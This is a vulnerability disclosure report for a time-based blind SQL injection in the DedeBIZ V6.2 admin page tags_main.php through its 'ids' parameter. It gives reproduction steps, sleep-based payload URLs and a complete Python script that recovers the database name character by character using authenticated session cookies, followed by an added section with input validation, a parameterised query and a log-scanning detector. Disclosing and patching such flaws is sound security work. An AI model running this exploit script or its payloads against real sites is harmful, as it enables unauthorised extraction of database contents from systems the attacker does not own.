[Cause of vulnerability]
In /src/admin/tags_main.php there is a possible SQL injection in the statement `$query = "DELETE FROM #@__tagindex WHERE id IN ($stringids)";`. `$stringids` is assigned from `$ids`, and `$ids` receives the value of the `ids` parameter of the request (for example http://localhost:8086/admin/tags_main.php?action=delete&ids=(select sleep(2))), so the value of `$ids` can be constructed to perform time-based blind injection.
Note that this statement can only be exploited if the queried table contains rows. The table stores the tag keywords of the site's articles, so the site must have articles for the table to be populated.
[Vulnerability demonstration]
On a fresh installation, the following steps are needed to populate the table mentioned above (sites on the Internet usually already have data here, because a site in use will have articles and therefore article tag keywords):
1. Create an article category (needed to create articles later) at http://localhost:8086/admin/catalog_add.php?listtype=all: enter "test" in "中文名称" (Chinese name) and save.
2. Create an article at http://localhost:8086/admin/article_add.php: choose "test" in "发布栏目" (publishing column), enter "test_article" in "文档标题" (document title) and "a" in "标签" (tags), then save.
3. After the above steps the SQL injection can be performed. First, fetch your cookies so that the request is authenticated. Then access http://localhost:8086/admin/tags_main.php?action=delete&ids=if(length(database())>0,sleep(3),666); you will notice a clear delay in the response.
4. Because the payload here is quite special, sqlmap takes much longer to complete the injection, so a Python script is used instead. The script below performs time-based blind SQL injection (remember to change the URL and cookies to yours). It is also available at https://github.com/yhy217/dedebiz--vul/blob/main/time_injection.zip, or you can use the Python code:
```python
import requests
import time

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'}
# Candidate characters for the database name, sorted by ASCII value: the
# payload uses '>' and stops at the first candidate that is not smaller than
# the real character, so candidates must be tried in ascending order
# (the original list also lacked 'j').
chars = ''.join(sorted('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'))
# replace with your cookies here
cookies = {
    "dede_csrf_token": "89fbfaabddf9fbc14a2fc148606818ff",
    "dede_csrf_token__ckMd5": "0fe49927c42c854a",
    "DedeLoginTime": "1695266280",
    "DedeLoginTime__ckMd5": "29e695100a28380a",
    "DedeStUUID": "7bf8a37cf0ee8",
    "DedeStUUID__ckMd5": "da06278b80034043",
    "DedeUserID": "1",
    "DedeUserID__ckMd5": "b55b6fbf67e0257e",
    "ENV_GOBACK_URL": "/admin/content_list.php",
    "PHPSESSID": "3r1etgf62m34mf1kqqt8r3pfi6",
}
DELAY = 2  # seconds; sleep(3) in the payload must exceed this threshold

database = ''
length = 0
# Step 1: find the length of the database name.
# Keep the '666' in the payload if(length(database())>{0},666,sleep(3)) so that no real tag row is deleted.
for l in range(1, 20):
    Url = 'http://localhost:8086/admin/tags_main.php?action=delete&ids=if(length(database())>{0},666,sleep(3))'  # replace with your url
    UrlFormat = Url.format(l)
    start_time0 = time.time()
    requests.get(UrlFormat, headers=headers, cookies=cookies)
    print(time.time() - start_time0)
    if time.time() - start_time0 > DELAY:
        print('database length is ' + str(l))
        length = l
        break

# Step 2: recover the name one character at a time.
# Keep the '666' in the payload if(ascii(substr(database(),{0},1))>{1},666,sleep(3)) for the same reason.
for i in range(1, length + 1):
    for char in chars:
        charAscii = ord(char)
        url = 'http://localhost:8086/admin/tags_main.php?action=delete&ids=if(ascii(substr(database(),{0},1))>{1},666,sleep(3))'  # replace with your url
        urlformat = url.format(i, charAscii)
        start_time = time.time()
        requests.get(urlformat, headers=headers, cookies=cookies)
        if time.time() - start_time > DELAY:
            database += char
            print('database: ', database)
            break
print('database is ' + database)
```
5. The current database name is obtained successfully by the script.
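As an added example (not part of this report and not DedeBIZ's own code), the following Python shows the handling the `ids` parameter needs: it is accepted only as a list of integers and bound as query parameters instead of being spliced into the IN clause, and the same check is reused to flag delete requests in a constructed access-log sample. The table name `#@__tagindex` is kept as in the statement above; the log lines are constructed.

```python
import re
from urllib.parse import urlparse, parse_qs

# Only a comma-separated list of positive integers is a legitimate value.
ID_LIST_RE = re.compile(r"\d+(,\d+)*")

def parse_ids(raw: str) -> list[int]:
    # Validate the ids parameter; anything else is rejected rather than
    # spliced into the IN (...) clause as tags_main.php did.
    raw = raw.strip()
    if not ID_LIST_RE.fullmatch(raw):
        raise ValueError("ids must be a comma-separated list of integers")
    ids = [int(x) for x in raw.split(",")]
    if any(i <= 0 for i in ids):
        raise ValueError("ids must be positive")
    return ids

def build_delete_query(ids: list[int]) -> tuple[str, list[int]]:
    # Parameterised form of the statement: one placeholder per id, values
    # handed to the driver separately so they are never parsed as SQL.
    if not ids:
        raise ValueError("empty id list")
    placeholders = ",".join(["%s"] * len(ids))
    return f"DELETE FROM #@__tagindex WHERE id IN ({placeholders})", ids

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [20/Sep/2023:10:00:01 +0000] "GET /admin/tags_main.php?action=delete&ids=12,13 HTTP/1.1" 200 512
10.0.0.9 - - [20/Sep/2023:10:00:07 +0000] "GET /admin/tags_main.php?action=delete&ids=if(length(database())>0,sleep(3),666) HTTP/1.1" 200 512
"""

def suspicious_requests(log_text: str) -> list[str]:
    # Flag delete requests to tags_main.php whose ids value fails the same
    # check the handler should apply: anything non-numeric can only be SQL.
    hits = []
    for line in log_text.splitlines():
        m = re.search(r'"GET (\S+) HTTP', line)
        if not m:
            continue
        url = urlparse(m.group(1))
        if not url.path.endswith("/admin/tags_main.php"):
            continue
        qs = parse_qs(url.query)
        if qs.get("action") != ["delete"]:
            continue
        for value in qs.get("ids", []):
            try:
                parse_ids(value)
            except ValueError:
                hits.append(value)
    return hits
```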
Thanks for reading so much. It is the first time for me to write so much about SQL injection.
[Suggested description]
SQL injection vulnerability exists in DedeBIZ V6.2 in /src/admin/tags_main.php
[Vulnerability Type]
SQL INJECTION
[Vendor of Product]
https://github.com/DedeBIZ/DedeV6
[Affected Product Code Base]
DedeBIZ V6.2
[Affected Component]
File: /src/admin/tags_main.php
Parameter: ids
[Attack Type]
Remote